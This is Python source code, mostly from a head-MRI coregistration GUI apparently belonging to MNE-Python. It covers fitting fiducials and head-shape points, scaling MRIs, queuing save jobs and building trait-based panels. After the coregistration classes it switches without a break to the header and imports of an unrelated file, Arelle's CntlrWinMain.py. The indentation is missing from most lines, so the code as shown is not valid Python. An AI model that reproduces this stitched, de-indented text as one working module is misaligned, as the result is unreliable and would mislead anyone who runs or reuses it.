mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False)
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"Find rotation to fit LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"Find rotation and translation to fit all 3 fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"Find rotation to fit head shapes"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.mri.points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"Find rotation and MRI scaling based on LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"Find translation, rotation and scaling based on the three fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"Find MRI scaling and rotation to match head shape points"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.mri.points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to):
desc = 'Scaling %s' % subject_to
func = scale_mri
args = (self.mri.subject, subject_to, self.scale)
kwargs = dict(overwrite=True, subjects_dir=self.mri.subjects_dir)
return (desc, func, args, kwargs)
def get_prepare_bem_model_job(self, subject_to):
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_name = 'inner_skull'
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name=bem_name)
if not os.path.exists(bem_file):
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='(.+)')
bem_dir, bem_file = os.path.split(pattern)
m = None
bem_file_pattern = re.compile(bem_file)
for name in os.listdir(bem_dir):
m = bem_file_pattern.match(name)
if m is not None:
break
if m is None:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='*')
err = ("No bem file found; looking for files matching "
"%s" % pattern)
error(err)
bem_name = m.group(1)
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name=bem_name)
# job
desc = 'mne_prepare_bem_model for %s' % subject_to
func = prepare_bem_model
args = (bem_file,)
kwargs = {}
return (desc, func, args, kwargs)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration"""
        self.reset_traits(('n_scale_params', 'scale_x', 'scale_y', 'scale_z',
'rot_x', 'rot_y', 'rot_z', 'trans_x', 'trans_y',
'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation parameters from a transformation matrix
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
trans = self.head_mri_trans
dig = deepcopy(self.hsp.fid_dig)
for i in range(len(dig)):
dig[i]['r'] = apply_trans(trans, dig[i]['r'])
info = {'to': FIFF.FIFFV_COORD_MRI, 'from': FIFF.FIFFV_COORD_HEAD,
'trans': trans, 'dig': dig}
write_trans(fname, info)
class CoregFrameHandler(Handler):
"""Handler that checks for unfinished processes before closing its window
"""
def close(self, info, is_ok):
if info.object.queue.unfinished_tasks:
msg = ("Can not close the window while saving is still in "
"progress. Please wait until all MRIs are processed.")
title = "Saving Still in Progress"
information(None, msg, title)
return False
else:
return True
class CoregPanel(HasPrivateTraits):
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
n_scale_params = DelegatesTo('model')
scale_step = Float(1.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_save = DelegatesTo('model')
prepare_bem_model = Bool(True)
save = Button(label="Save As...")
load_trans = Button
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(VGroup(Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:No Scaling',
1: '2:1 Param',
3: '3:3 Params'},
cols=3)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0'),
Item('scale_x_dec',
enabled_when='n_scale_params > 0'),
Item('scale_x_inc',
enabled_when='n_scale_params > 0'),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0'),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_y_dec',
enabled_when='n_scale_params > 1'),
Item('scale_y_inc',
enabled_when='n_scale_params > 1'),
Label('(Step)'),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_z_dec',
enabled_when='n_scale_params > 1'),
Item('scale_z_inc',
enabled_when='n_scale_params > 1'),
show_labels=False, columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
'_',
Label("Translation:"),
VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis"),
'trans_x_dec', 'trans_x_inc',
Item('trans_step', tooltip="Movement step"),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_y_dec', 'trans_y_inc',
Label('(Step)'),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_z_dec', 'trans_z_inc',
show_labels=False, columns=4),
Label("Rotation:"),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis"),
'rot_x_dec', 'rot_x_inc',
Item('rot_step', tooltip="Rotation step"),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_y_dec', 'rot_y_inc',
Label('(Step)'),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_z_dec', 'rot_z_inc',
show_labels=False, columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point"),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place"),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials"),
Item('load_trans', enabled_when='has_fid_data'),
show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
HGroup(Item('prepare_bem_model'),
Label("Run mne_prepare_bem_model"),
show_labels=False,
enabled_when='n_scale_params > 0'),
HGroup(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton])
def __init__(self, *args, **kwargs):
super(CoregPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker():
while True:
desc, cmd, args, kwargs = self.queue.get()
self.queue_len -= 1
self.queue_current = 'Processing: %s' % desc
# task
try:
cmd(*args, **kwargs)
except Exception as err:
self.error = str(err)
res = "Error in %s"
else:
res = "Done: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % desc
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
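        # Jobs put on self.queue are consumed by this daemon thread as
        # (description, callable, args, kwargs) tuples; _save_fired enqueues
        # the MRI scaling job and, optionally, the mne_prepare_bem_model job
        # in that form.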
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _n_scale_params_changed(self, new):
if not new:
return
# Make sure that MNE_ROOT environment variable is set
if not assert_env_set(mne_root=True):
err = ("MNE_ROOT environment variable could not be set. "
"You will be able to scale MRIs, but the preparatory mne "
"tools will fail. Please specify the MNE_ROOT environment "
"variable. In Python this can be done using:\n\n"
">>> os.environ['MNE_ROOT'] = '/Applications/mne-2.7.3'")
warning(None, err, "MNE_ROOT Not Set")
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
self.model.load_trans(trans_file)
def _save_fired(self):
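        # Flow: ask for a target subject (when scaling is enabled), choose the
        # trans-file destination, save the trans file, then queue the MRI
        # scaling and optional BEM-preparation jobs for the background worker.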
if self.n_scale_params:
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
subject_to = self.model.raw_subject or self.model.mri.subject
else:
subject_to = self.model.mri.subject
# ask for target subject
if self.n_scale_params:
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
            if not ui.result:
return
subject_to = mridlg.subject_to
# find bem file to run mne_prepare_bem_model
if self.n_scale_params and self.prepare_bem_model:
bem_job = self.model.get_prepare_bem_model_job(subject_to)
else:
bem_job = None
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file = trans_file + '.fif'
if os.path.exists(trans_file):
            answer = confirm(None, "The file %r already exists. Should it "
                             "be replaced?" % trans_file, "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, str(e), "Error Saving Trans File")
return
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to)
self.queue.put(job)
self.queue_len += 1
if bem_job is not None:
self.queue.put(bem_job)
self.queue_len += 1
def _scale_x_dec_fired(self):
step = 1. / self.scale_step
self.scale_x *= step
def _scale_x_inc_fired(self):
self.scale_x *= self.scale_step
def _scale_x_changed(self, old, new):
if self.n_scale_params == 1:
self.scale_y = new
self.scale_z = new
def _scale_y_dec_fired(self):
step = 1. / self.scale_step
self.scale_y *= step
def _scale_y_inc_fired(self):
self.scale_y *= self.scale_step
    def _scale_z_dec_fired(self):
        step = 1. / self.scale_step
        self.scale_z *= step
    def _scale_z_inc_fired(self):
        self.scale_z *= self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
width=500,
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=-1):
"""Create a view for the CoregFrame
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
scene_width : int
Specify a minimum width for the 3d scene (in pixels).
    Returns
-------
view : traits View
View object for the CoregFrame.
"""
view_options = VGroup(Item('headview', style='custom'), 'view_options',
show_border=True, show_labels=False, label='View')
scene = VGroup(Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=500),
view_options)
data_panel = VGroup(VGroup(Item('subject_panel', style='custom'),
label="MRI Subject", show_border=True,
show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2,
values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True,
show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup(Item('distance', show_label=True),
'omit_points', 'reset_omit_points',
show_labels=False),
Item('omitted_info', style='readonly',
show_label=False),
label='Head Shape Source (Raw)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
coreg_panel = VGroup(Item('coreg_panel', style='custom'),
label="Coregistration", show_border=True,
show_labels=False,
enabled_when="fid_panel.locked")
if split:
main_layout = 'split'
else:
main_layout = 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons)
return view
class ViewOptionsPanel(HasTraits):
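    """Dialog exposing display options for the MRI head surface and the
    digitizer head shape point cloud."""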
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom', # show_border=True,
label="MRI Head Surface"),
Item('hsp_obj', style='custom', # show_border=True,
label="Head Shape Points")),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration
"""
model = Instance(CoregModel, ())
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
raw_src = DelegatesTo('model', 'hsp')
# Omit Points
distance = Float(5., label="Distance [mm]", desc="Maximal distance for "
"head shape points from MRI in mm")
omit_points = Button(label='Omit Points', desc="Omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset Omission', desc="Reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
# visualization
hsp_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
view_options_panel = Instance(ViewOptionsPanel)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
panel = FiducialsPanel(model=self.model.mri, headview=self.headview)
return panel
def _coreg_panel_default(self):
panel = CoregPanel(model=self.model)
return panel
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None):
super(CoregFrame, self).__init__()
subjects_dir = get_subjects_dir(subjects_dir)
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if subject is not None:
self.model.mri.subject = subject
if raw is not None:
self.model.hsp.file = raw
@on_trait_change('scene.activated')
def _init_plot(self):
self.scene.disable_render = True
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['mri_color']
self.mri_obj = SurfaceObject(points=self.model.mri.points, color=color,
tri=self.model.mri.tris, scene=self.scene)
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('scale', self.mri_obj, 'trans', mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale)
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['hsp_point_color']
point_scale = defaults['hsp_points_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5)
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['hsp_fid_scale']
opacity = defaults['hsp_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale)
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
self.scene.disable_render = False
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
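# Illustrative usage sketch (not part of the original module): one way to
# launch the coregistration GUI, assuming a FreeSurfer subjects directory and
# a raw FIF file are available; the paths below are placeholders.
#
# if __name__ == '__main__':
#     frame = CoregFrame(raw='/path/to/sample_raw.fif', subject='sample',
#                        subjects_dir='/path/to/subjects')
#     frame.configure_traits()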
CntlrWinMain.py
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, fnmatch
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
    # need the .dll directory in path to be able to access Tk and Tcl DLLs before importing Tk, etc.
os.environ['PATH'] = os.path.dirname(sys.executable) + ";" + os.environ['PATH']
from tkinter import (Tk, Tcl, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
try:
import syslog
except ImportError:
syslog = None
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.FileSource import saveFile as writeToFile
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewFileFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
